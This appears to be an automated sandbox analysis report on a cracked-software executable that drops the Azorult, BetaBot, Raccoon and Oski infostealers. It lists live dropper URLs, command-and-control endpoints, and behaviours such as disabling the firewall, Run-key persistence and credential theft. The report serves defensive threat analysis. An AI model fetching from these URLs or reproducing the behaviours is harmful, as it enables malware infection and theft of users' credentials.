azorult | 390d7472201e8ea9bdc6c7fa2b4ab1f6faca02071f1f997037cc5f52759a9cb6

Resubmissions

12-11-2021 18:04

211112-wnzb8aahhm 10

19-11-2020 10:08

201119-rhwlt38jrx 10

18-11-2020 17:26

201118-htd4fq29va 10

Analysis

max time kernel
338s
max time network
336s
platform
windows10_x64
resource
win10-en-20211104
submitted
12-11-2021 18:04

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

amtemu.v0.9.2.win-painter_edited.exe
Size

3.5MB
MD5

88124e4aba906259af28a466774431ea
SHA1

fbc1c27e0d7177238ec99481ffa7d839d1f51594
SHA256

1b94ce5e3fb24f02cd970bf09031482d4e2bafebcaafc3f477a735d483e13dbd
SHA512

cdc0af6ea2686d35e4a77f4eb802ba9e41819b052253071a397601bec4d6232e5351d21b5d8ab4644e9f6ffd67057ec8c6f2db8605b429afcdf7b3ecd8005e2d

Score

10^/10

azorult betabot oski raccoon 32365171a31c4583d6e3b7aad1690e41cefc38eb backdoor botnet collection discovery evasion infostealer persistence spyware stealer suricata trojan

Malware Config

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJv

exe.dropper

http://bit.do/fqhJv

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhHT

exe.dropper

http://bit.do/fqhHT

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://pdshcjvnv.ug/zxcvb.exe

exe.dropper

http://pdshcjvnv.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://bit.do/fqhJD

exe.dropper

http://bit.do/fqhJD

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://rbcxvnb.ug/zxcvb.exe

exe.dropper

http://rbcxvnb.ug/zxcvb.exe

Extracted

Language

ps1

Source

URLs

ps1.dropper

http://zxvbcrt.ug/zxcvb.exe

exe.dropper

http://zxvbcrt.ug/zxcvb.exe

Extracted

Family

raccoon

Botnet

32365171a31c4583d6e3b7aad1690e41cefc38eb

Attributes

url4cnc
http://telegalive.top/brikitiki

http://toptelete.top/brikitiki

http://telegraf.top/brikitiki

https://t.me/brikitiki

rc4.plain

Extracted

Family

oski

colonna.ac.ug

Signatures

Azorult
An information stealer that was first discovered in 2016, targeting browsing history and passwords.
trojan infostealer azorult
BetaBot
Beta Bot is a Trojan that infects computers and disables Antivirus.
trojan backdoor botnet betabot

Modifies firewall policy service 2 TTPs 4 IoCs

evasion

Modify Registry

T1112

Modify Existing Service

T1031

description	ioc	Process
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\StandardProfile\EnableFirewall = "0"	explorer.exe
Key created	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile	explorer.exe
Set value (int)	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\PublicProfile\EnableFirewall = "0"	explorer.exe

Oski
Oski is an infostealer targeting browser data, crypto wallets.
infostealer oski
Raccoon
Simple but powerful infostealer which was very active in 2019.
stealer raccoon
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata: ET MALWARE Possible Compromised Host AnubisNetworks Sinkhole Cookie Value Snkz
suricata
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata: ET MALWARE Suspicious Zipped Filename in Outbound POST Request (Passwords.txt)
suricata
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata: ET MALWARE Terse alphanumeric executable downloader high likelihood of being hostile
suricata
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata: ET MALWARE Vidar/Arkei/Megumin/Oski Stealer Data Exfil
suricata
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata: ET MALWARE Win32/AZORult V3.3 Client Checkin M18
suricata
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
suricata: ET MALWARE Win32/Neurevt.A/Betabot Check-in 4
suricata

Blocklisted process makes network request 6 IoCs

flow	pid	Process
32	428	powershell.exe
34	428	powershell.exe
36	3188	powershell.exe
37	4136	powershell.exe
47	3324	powershell.exe
49	3324	powershell.exe

Downloads MZ/PE file

Drops file in Drivers directory 1 IoCs

description	ioc	Process
File opened for modification	C:\Windows\System32\drivers\etc\hosts	cmd.exe

Executes dropped EXE 38 IoCs

pid	Process
920	key.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3560	data.dat
3116	bb.exe
1276	bb.exe
1808	puttty.exe
1308	ereds.exe
972	Keygen.exe
4884	mwh.exe
4900	gev.exe
4964	mwh.exe
4880	gev.exe
2132	gev.exe
2696	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3104	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
5100	vkr.exe
1764	cdvcxsdme.exe
4700	vbndfgame.exe
3988	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
700	Dxndvkhrxwosconsoleapp14.exe
4312	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
5032	Dxndvkhrxwosconsoleapp14.exe
4552	cc.exe
1336	pm.exe
4888	Dxndvkhrxwosconsoleapp14.exe
4964	Dxndvkhrxwosconsoleapp14.exe
4384	aspnet_compiler.exe
1164	cc.exe
3484	fodhelper.exe
1668	fodhelper.exe
1320	vkr.exe
4880	vbndfgame.exe
1440	cdvcxsdme.exe
4424	fodhelper.exe
1676	fodhelper.exe
4548	fodhelper.exe
4560	fodhelper.exe
1264	fodhelper.exe

Sets file execution options in registry 2 TTPs
persistence

Registry Run Keys / Startup Folder
T1060

Modify Registry
T1112

Checks BIOS information in registry 2 TTPs 1 IoCs

BIOS information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\SystemBiosVersion	explorer.exe

Loads dropped DLL 14 IoCs

pid	Process
3560	data.dat
3988	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3988	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3988	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
3988	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
4888	Dxndvkhrxwosconsoleapp14.exe
4888	Dxndvkhrxwosconsoleapp14.exe
4888	Dxndvkhrxwosconsoleapp14.exe
4964	Dxndvkhrxwosconsoleapp14.exe
4964	Dxndvkhrxwosconsoleapp14.exe
4964	Dxndvkhrxwosconsoleapp14.exe
4880	vbndfgame.exe
4880	vbndfgame.exe
4880	vbndfgame.exe

Reads data files stored by FTP clients 2 TTPs
Tries to access configuration files associated with programs like FileZilla.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads local data of messenger clients 2 TTPs
Infostealers often target stored data of messaging applications, which can include saved credentials and account information.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of local email clients 2 TTPs
Email clients store some user data on disk where infostealers will often target it.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081
Reads user/profile data of web browsers 2 TTPs
Infostealers often target stored browser data, which can include saved credentials etc.
spyware stealer

Data from Local System
T1005

Credentials in Files
T1081

Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs

collection

Email Collection

T1114

description	ioc	Process
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key opened	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
spyware

Data from Local System
T1005

Credentials in Files
T1081

Adds Run key to start application 2 TTPs 7 IoCs

persistence

Registry Run Keys / Startup Folder

T1060

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe\""	explorer.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\Run	data.dat
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\Google Updater 5.0 = "\"C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe\""	data.dat
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Run\winda = "\"C:\\Users\\Admin\\AppData\\Roaming\\winda.exe\""	pm.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce	explorer.exe
Set value (str)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\RunOnce\Google Updater 5.0 = "C:\\ProgramData\\Google Updater 5.0\\iqw3o1755773.exe"	explorer.exe

Checks installed software on the system 1 TTPs
Looks up Uninstall key entries in the registry to enumerate software on the system.
discovery

Query Registry
T1012

Checks whether UAC is enabled 1 TTPs 35 IoCs

evasion trojan

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WScript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	ereds.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gev.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vkr.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cdvcxsdme.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	bb.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Keygen.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	key.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	gev.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	puttty.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	data.dat
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	vbndfgame.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mshta.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	mwh.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	WScript.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cmd.exe
Key value queried	\REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA	cc.exe

Maps connected drives based on registry 3 TTPs 64 IoCs

Disk information is often read in order to detect sandboxing environments.

Query Registry

T1012

Peripheral Device Discovery

T1120

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	mwh.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	key.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Dxndvkhrxwosconsoleapp14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Keygen.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	mshta.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	vbndfgame.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	data.dat
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	ereds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	vkr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cdvcxsdme.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	WerFault.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	data.dat
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	mshta.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	gev.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	mwh.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	mshta.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	gev.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cdvcxsdme.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	gev.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	vkr.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	mshta.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cc.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Dxndvkhrxwosconsoleapp14.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	vbndfgame.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	puttty.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	key.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	WerFault.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	puttty.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	ereds.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	fodhelper.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	dw20.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cmd.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	fodhelper.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	powershell.exe
Key opened	\REGISTRY\MACHINE\SYSTEM\ControlSet001\services\Disk\Enum	gev.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\Disk\Enum\0	cc.exe

Suspicious use of NtSetInformationThreadHideFromDebugger 64 IoCs

pid	Process
1276	bb.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
2220	explorer.exe
3560	data.dat
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
3560	data.dat
3560	data.dat
3560	data.dat
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
2088	Microsoft.VisualStudio.Package.LanguageService.11.0.exe
1808	puttty.exe
1808	puttty.exe
1808	puttty.exe
2220	explorer.exe
1808	puttty.exe
1308	ereds.exe
1308	ereds.exe
1308	ereds.exe
1308	ereds.exe
2220	explorer.exe
972	Keygen.exe
2376	dw20.exe
832	cmd.exe
972	Keygen.exe
972	Keygen.exe
972	Keygen.exe
2376	dw20.exe
2376	dw20.exe
2376	dw20.exe
832	cmd.exe
832	cmd.exe
832	cmd.exe
1936	mshta.exe
1936	mshta.exe
1936	mshta.exe
1936	mshta.exe
1392	mshta.exe
1392	mshta.exe
1392	mshta.exe
1392	mshta.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe
4136	powershell.exe
920	key.exe
920	key.exe
920	key.exe
920	key.exe
1408	cmd.exe
4368	powershell.exe
1408	cmd.exe
1408	cmd.exe
1408	cmd.exe
4368	powershell.exe
4368	powershell.exe
4368	powershell.exe
3324	powershell.exe
3324	powershell.exe
3324	powershell.exe

Suspicious use of SetThreadContext 15 IoCs

description	pid	Process	procid_target
PID 3116 set thread context of 1276	3116	bb.exe	83
PID 4884 set thread context of 4964	4884	mwh.exe	124
PID 4900 set thread context of 2132	4900	gev.exe	126
PID 2696 set thread context of 3988	2696	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	133
PID 3104 set thread context of 4312	3104	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe	136
PID 700 set thread context of 4888	700	Dxndvkhrxwosconsoleapp14.exe	143
PID 5032 set thread context of 4964	5032	Dxndvkhrxwosconsoleapp14.exe	144
PID 1336 set thread context of 4384	1336	pm.exe	150
PID 4552 set thread context of 1164	4552	cc.exe	153
PID 3484 set thread context of 1668	3484	fodhelper.exe	158
PID 5100 set thread context of 1320	5100	vkr.exe	161
PID 4700 set thread context of 4880	4700	vbndfgame.exe	162
PID 1764 set thread context of 1440	1764	cdvcxsdme.exe	163
PID 4424 set thread context of 1676	4424	fodhelper.exe	169
PID 4548 set thread context of 4560	4548	fodhelper.exe	171

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

System Information Discovery
T1082

Program crash 1 IoCs

pid	pid_target	Process	procid_target
4912	2132	WerFault.exe	126

Checks processor information in registry 2 TTPs 9 IoCs

Processor information is often read in order to detect sandboxing environments.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	explorer.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	Dxndvkhrxwosconsoleapp14.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	vbndfgame.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	bb.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString	bb.exe
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0	explorer.exe

Creates scheduled task(s) 1 TTPs 2 IoCs

Schtasks is often used by malware for persistence or to perform post-infection execution.

persistence

Scheduled Task

T1053

pid	Process
2228	schtasks.exe
1148	schtasks.exe

Delays execution with timeout.exe 7 IoCs

evasion

pid	Process
688	timeout.exe
3716	timeout.exe
1920	timeout.exe
2728	timeout.exe
1548	timeout.exe
4896	timeout.exe
2120	timeout.exe

Enumerates system info in registry 2 TTPs 2 IoCs

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key opened	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS	explorer.exe
Key value queried	\REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer	explorer.exe

Kills process with taskkill 3 IoCs

evasion

pid	Process
1540	taskkill.exe
2328	taskkill.exe
3068	taskkill.exe

Modifies Internet Explorer Protected Mode 1 TTPs 4 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\3\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\4\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\1\2500 = "3"	explorer.exe
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Zones\2\2500 = "3"	explorer.exe

Modifies Internet Explorer Protected Mode Banner 1 TTPs 1 IoCs

Modify Registry

T1112

description	ioc	Process
Set value (int)	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main\NoProtectedModeBanner = "1"	explorer.exe

Modifies Internet Explorer settings 1 TTPs 1 IoCs

adware spyware

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000\Software\Microsoft\Internet Explorer\Main	explorer.exe

Modifies registry class 5 IoCs

description	ioc	Process
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	cmd.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	mwh.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	gev.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe
Key created	\REGISTRY\USER\S-1-5-21-1042495040-510797905-2613508344-1000_Classes\Local Settings	Uxqcrfgglyzuwogibeigruaconsoleapp12.exe

Modifies system certificate store 2 TTPs 2 IoCs

evasion spyware trojan

Install Root Certificate

T1130

Modify Registry

T1112

description	ioc	Process
Key created	\REGISTRY\MACHINE\SOFTWARE\Microsoft\SystemCertificates\AuthRoot\Certificates\D1EB23A46D17D68FD92564C2F1F1601764D8E349	cc.exe
